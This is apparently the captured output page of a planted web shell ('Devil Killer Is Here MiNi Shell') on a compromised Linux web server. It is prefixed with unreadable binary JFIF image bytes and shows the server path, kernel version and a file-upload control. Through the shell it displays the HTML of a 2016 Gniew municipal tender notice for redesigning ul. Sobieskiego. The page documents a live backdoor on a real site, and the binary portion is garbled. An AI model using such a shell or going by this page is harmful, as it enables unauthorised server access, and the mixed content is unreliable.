JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160923/312775-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 312775 - 2016
              z dnia 2016-09-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gniew: Opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej przebudowy ul. Sobieskiego w Gniewie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Miasta i Gminy w Gniewie, krajowy numer identyfikacyjny
              52758100000, ul.
              Pl. Grunwaldzki 
              1,
              83140  
              Gniew, woj.
              pomorskie, państwo
              , tel.
              058 5352255 w. 14, 39, e-mail
              ratusz@gniew.pl, faks
              058 5352258 w. 40.
              <br />
              Adres strony internetowej (URL): www.gniew.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />bip.gniew.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.gniew.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />osobiście bądź przesyłką pocztową<br />
                Adres:
                <br />Urząd Miasta i Gminy Gniew, Plac Grunwaldzki 1, 83-140 Gniew, sekretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej przebudowy ul. Sobieskiego w Gniewie<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej przebudowy :
1) odcinka ul. Sobieskiego (wg załącznika graficznego), na działkach ewidencyjnych 
nr: 24/1;25/1;24/4;25/4; arkusz mapy 7,nr:  1/9; 1/19;24/4;25/4; arkusz mapy 8, nr 11; 21/1; 21/2; 22/1; arkusz mapy 9, 
2) skrzyżowania ul. Sobieskiego z ulicą 27- Stycznia (droga powiatowa nr 2880G) Gniewie 
(wg załącznika graficznego) na działkach ewidencyjnych nr:  1; 29; 85 arkusz mapy 10 obręb Gniew.
oraz uzyskanie, w imieniu Zamawiającego, decyzji o pozwoleniu na budowę. 

2.Teren objęty zamówieniem jest ujęty w miejscowym planie zagospodarowania przestrzennego (w załączeniu), objęty ochroną konserwatorską (uzgodnienie z konserwatorem zabytków).

3. Zakres zamówienia obejmuje zaprojektowanie ciągów pieszych, nawierzchni drogi, parkingów, zieleni, małej architektury.

4. Nawierzchnie zaprojektować zgodnie z załączonym wycinkiem Programu Funkcjonalno Użytkowego dotyczącym ul. Sobieskiego oraz wytycznymi konserwatorskimi.
Zamawiający udzieli wykonawcy pisemnego pełnomocnictwa w celu uzyskania pozwolenia 
na budowę. Wytyczne techniczne do projektowania zgodnie z obowiązującymi przepisami prawa budowlanego. 
Ulica Sobieskiego posiada nawierzchnię asfaltową. Należy ją wymienić na kostkę granitową rzędową (kolorową), wymiary  13-15/18-22 cm , wys. 14,0 cm
Chodniki posiadają nawierzchnię z kostki brukowej betonowej oraz z płyt chodnikowych kwadratowych. Należy ją wymienić na kostkę granitową rzędową (kolor rdzawo  żółty lub szary), wymiary 8/11 cm i na płyty granitowe płomieniowane, wymiary  90/60 cm, wys. 10,0 cm oraz wprowadzić krawężniki granitowe, wymiary 15/30 cm (obniżone)

konstrukcja warstw ulicy:
	kostka granitowa rzędowa, kolorowa, wymiary 13-15/18-22 cm , wys. 14,0 cm
	podsypka cementowo  piaskowa 1:4, gr. do 5,0 cm
	tłuczeń, gr. 20,0 cm
	podsypka piaskowa, gr. 15,0 cm

konstrukcja warstw chodnika z kostki granitowej rzędowej:
	kostka granitowa rzędowa, kolor rdzawo  żółty lub szary, wymiary 8/11 cm  
	podsypka cementowo  piaskowa 1:4, gr. do 5,0 cm
	tłuczeń, gr. 10,0 cm 
	podsypka piaskowa, gr. 10,0 cm


konstrukcja warstw chodnika z płyty granitowej płomieniowanej:
	płyta granitowa płomieniowana, kolor kamień polny, wymiary 90/60 cm, wys. 10,0 cm  
	podsypka cementowo  piaskowa 1:4, gr. do 7,0 cm
	tłuczeń, gr. 10,0 cm 
	podsypka piaskowa, gr. 10,0 cm

krawężniki:
	krawężnik granitowy zeskosowany, wymiary 15/30 cm 
	podsypka cementowo  piaskowa 1:4, gr. do 3,0 cm
	ława betonowa z oporem klasy B15
	podsypka piaskowa, gr. 5,0 cm  

Wszelkie elementy dotyczące wyposażenia (małej architektury) należy konsultować z Konserwatorem nadzorującym prace projektowe oraz Inwestorem.
Wszelkie elementy dotyczące zagospodarowania terenu należy konsultować z Konserwatorem nadzorującym prace projektowe.
Dobór materiałów i szczegółowe rozwiązania projektowe należy każdorazowo przedłożyć do zatwierdzenia Zamawiającemu.

Obowiązujący miejscowy plan zagospodarowania przestrzennego dla przedmiotowego obszaru:
	miejscowy plan zagospodarowania przestrzennego uchwalony Uchwałą Nr VII/69/07 Rady Miejskiej 
w Gniewie z dnia 26 kwietnia 2007 r. w sprawie uchwalenia Miejscowego Planu Zagospodarowania Przestrzennego na obszarze Starego Miasta, Wzgórza Zamkowego, Podzamcza w miejscowości Gniew jako planowanego obszaru przestrzeni publicznej

Zalecenia Programu prac konserwatorskich  elementy na które należy zwrócić szczególną uwagę:
NAWIERZCHNIA, RZĘDNA I PROFIL 
	Dokonanie odkrywek w celu zbadania materiałów użytych do wykonania nawierzchni, profili, kolorystyki, wątków ułożenia bruku i pierwotnych rzędnych
	Podjęcie decyzji w konsultacji z Konserwatorem nadzorującym prace projektowe zasadność powrotu do pierwotnych rzędnych (zgodnie z wytycznymi MPZP). Należy wziąć pod uwagę dostępność osób niepełnosprawnych, starszych i z małymi dziećmi W miarę możliwości odtworzenie pierwotnych profili. Przy czym zaleca się ujednolicenie rzędnych i zastosowanie krawężników obniżonych między chodnikiem, a drogą ze względu na dostępność dla osób z poruszaniem się.
MAŁA ARCHITEKTURA
	Należy zaprojektować ławki, stojaki na kwietniki i zabezpieczenie drzew.
	Dopuszczalne jest zastosowanie współczesnego designu, przy odpowiednim wkomponowaniu 
go w historyczny kontekst i w porozumieniu z Konserwatorem nadzorującym prace projektowe.

5. Zamawiający wymaga aby wykonawca sprawował nadzór autorski na etapie realizacji inwestycji.   
Nadzór autorski w szczególności obejmuje: 
1)	czuwanie nad zgodnością wykonawstwa z dokumentacją projektową w zakresie rozwiązań użytkowych, technicznych i materiałowych, 
2)	wyjaśnianie przez Wykonawcę wątpliwości powstałych w toku realizacji inwestycji przez dodatkowe informacje i opracowania oraz uzupełnianie szczegółów dokumentacji, 
3)	uzgadnianie z Zamawiającym i Wykonawcą robót możliwości wprowadzania rozwiązań zamiennych w stosunku do przewidzianych w projekcie, 
4)	udział w komisjach i naradach technicznych, odbiorze inwestycji. 
3.Ponadto, Wykonawca zobowiązany jest do udzielania wszelkich odpowiedzi na pytania dotyczące dokumentacji projektowej jakie mogą zostać zadane przez przedsiębiorców biorących udział 
w postępowaniu, którego przedmiotem zamówienia będzie przebudowa części ul. Sobieskiego 
w Gniewie.

Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy 
o pracę osób wykonujących czynności w zakresie realizacji zamówienia jeżeli wykonanie tych czynności podlega wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r Kodeks pracy (Dz. U. z 2014 r. poz. 1502 z późn. zm.). 
Wykonawca przed podpisaniem umowy Dostarczy Zamawiającemu szczegółowe wykazy osób 
o których mowa powyżej.

2. Każda z dokumentacji musi zawierać:
1) mapę do celów projektowych (podkład geodezyjno-wysokościowy) w skali 1:500 i 1:1000               (w zależności od gęstości zabudowy i uzbrojenia na terenie objętym dokumentacją) dla terenu niezbędnego do wykonania przedmiotu zamówienia oraz dla innych terenów, o ile prace projektowe    i uzgodnienia wykażą taką potrzebę.
Zamawiającemu należy przekazać zeskanowaną mapę: na płycie CD w formacie TIFF/lub PDF  1 egz., oryginał mapy  1 egz.
2) plan orientacyjny w skali 1: 5000,
3) mapę ewidencji gruntów, wykaz właścicieli i władających, przez jakie działki (nr arkusza, obręb) przechodzą projektowane urządzenia i uzbrojenia, 
4) uzyskaną w imieniu Zamawiającego decyzję o środowiskowych uwarunkowaniach                           dla przedsięwzięcia  publicznego, ewentualnie sporządzenie raportu oddziaływania na środowisko (jeżeli wystąpi taka potrzeba),
5) projekt budowlano-wykonawczy  6 egz.
6) projekt budowlano-wykonawczy innych urządzeń wraz z zasilaniem energetycznym i włączenia go do istniejącego systemu (jeżeli wystąpi taka potrzeba),  6 egz.
7) wszelkie wymagane uzgodnienia projektowe (w tym uzyskanie warunków technicznych przyłączenia  do sieci elektroenergetycznych) i inne niezbędne opinie,
8) badania geologiczno  inżynierskie oraz ustalenie geotechnicznych
9) projekt tymczasowej organizacji ruchu  wytyczne dla wykonawcy robót  3 egz.
10) projekt przebudowy lub zabezpieczenia kolidującej infrastruktury technicznej (w miarę wystąpienia takiej potrzeby)  3 egz.
11) projekt odtworzenia nawierzchni po robotach uzgodniony z właściwym dla danego obszaru zarządcą drogi lub właścicielem terenu.
12) dokumentacja dendrologiczna (wycinki drzew i krzewów, jeżeli wystąpi taka potrzeba)  2 egz.
13) specyfikację techniczną wykonania i odbioru robot dla każdej branży  3 egz.
14) przedmiary robót  2 egz.
15) kosztorys inwestorski  2 egz. + zbiorcze zestawienie kosztów  2 egz.
16) wersję elektroniczną dokumentacji  na płycie DVD    1 egz.
17) uzyskanie, w imieniu zamawiającego, decyzji o pozwoleniu na budowę.

3. Dokumentacja stanowiąca przedmiot odbioru powinna być zaopatrzona w następujące załączniki:
1)  wykaz opracowań,
2) pisemne oświadczenie Wykonawcy i sprawdzającego, że dokumentacja jest wykonana zgodnie                      z umową, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej (art. 20 ust. 4 Prawa budowlanego),
3) pisemne oświadczenie Wykonawcy, że dokumentacja zostaje wydana w stanie  zupełnym/ kompletnym dla celu, któremu ma służyć,

Załączniki ww. stanowią integralną część dokumentacji projektowej.

4. Zamawiający zastrzega, by informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń określały przedmiot zamówienia w sposób zgodny z ustawą Prawo zamówień publicznych, tzn. bez używania nazw własnych, a jedynie poprzez określenie parametrów precyzujących rodzaj, standard oraz inne istotne elementy. 
5. Zamawiający dysponuje dokumentacją archiwalną dotyczącą przedmiotu zamówienia
<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających                                       w wysokości do 50 % wartości zamówienia podstawowego polegające na powtórzeniu tego samego rodzaju zamówień, zgodnego z przedmiotem zamówienia podstawowego.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 27/03/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie opisuje w sposób szczególny wymagań od wykonawców w ramach tego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W ramach tego warunku wykonawca zobowiązany jest do:
	posiadania środków finansowych lub zdolności kredytowej o łącznej kwocie w wysokości co najmniej 50.000,00 złotych;
	Wykazania, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Minimalna kwota ubezpieczenia to 50.000,00 złotych.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy  w tym okresie wykonał co najmniej 2 usługi polegające na projektowaniu obiektów liniowych (drogowych, placów lub chodników) o długości minimum 0,5 km w zakresie odpowiadającym przedmiotowi zamówienia. Wykonawca nie może sumować kilku usług 
o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.
Jednocześnie wykonawca wykaże, że dysponuje co najmniej: 
	jedną osobą posiadającą uprawnienia projektowe w specjalności drogowej bez ograniczeń, 5 letnie doświadczenie zawodowe oraz wpisanymi na listę członków właściwej izby samorządu zawodowego, potwierdzonymi zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności; 
	jedną osobą posiadającą uprawnienia projektowe w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych, 5 letnie doświadczenie zawodowe oraz wpisanymi na listę członków właściwej izby samorządu zawodowego, potwierdzonymi zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności; 
	jedną osobą posiadającą uprawnienia projektowe w specjalności instalacyjnej bez ograniczeń w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych umożliwiającej zrealizowanie przedmiotowego zadania, 5 letnie doświadczenie zawodowe oraz wpisaną na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności
	 jedną osobą posiadającą uprawnienia projektowe w specjalności konstrukcyjnej, 
5 letnie doświadczenie zawodowe oraz wpisaną na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, 
z określonym w nim terminem ważności. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Zamawiający będzie dokonywał oceny spełnienia warunku zdolności technicznej na podstawie:
	Wykazu usług wykonanych nie wcześniej niż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wraz z podaniem ich rodzaju , wartości, daty, miejsca wykonania i podmiotów na rzecz których usługi te zostały wykonane z załączeniem dowodów określających czy usługi te zostały wykonane należycie.
	Dowodami o których mowa powyżej mogą być:
	referencje,
	inne dokumenty wystawione przez podmiot na rzecz którego roboty budowlane zostały wykonane,
	oświadczenie wykonawcy - jeżeli z uzasadnionej  o obiektywnym charakterze wykonawca nie jest w stanie uzyskać dokumentów o których mowa w tiret 1 i 2. 
Zamawiający będzie dokonywał oceny spełnienia warunku posiadania osób zdolnych do wykonania zamówienia na podstawie: 
	wykazu osób, które będą uczestniczyć w realizacji zamówienia wraz z informacjami 
na temat ich kwalifikacji i doświadczenia oraz informacją o podstawie dysponowania tymi osobami (załącznik nr 5 do SIWZ). Zamawiający wymaga, aby osoby wskazane 
w wykazie, w celu wykazania spełnienia warunków udziału w postępowaniu uczestniczyły w jego realizacji. Na etapie realizacji zamówienia zmiana osoby wskazanej w wykazie będzie możliwa na wniosek wykonawcy, uzasadniony obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez zamawiającego kandydatury innej osoby spełniającej warunki zawarte w niniejszej specyfikacji;
	oświadczenia że osoby, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, posiadają odpowiednie kwalifikacje zawarte w załączniku  nr 5 do SIWZ.
podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, 
z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity: Dz. U. z 2010 r. nr 243, poz. 1623) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394).
Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień 
budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
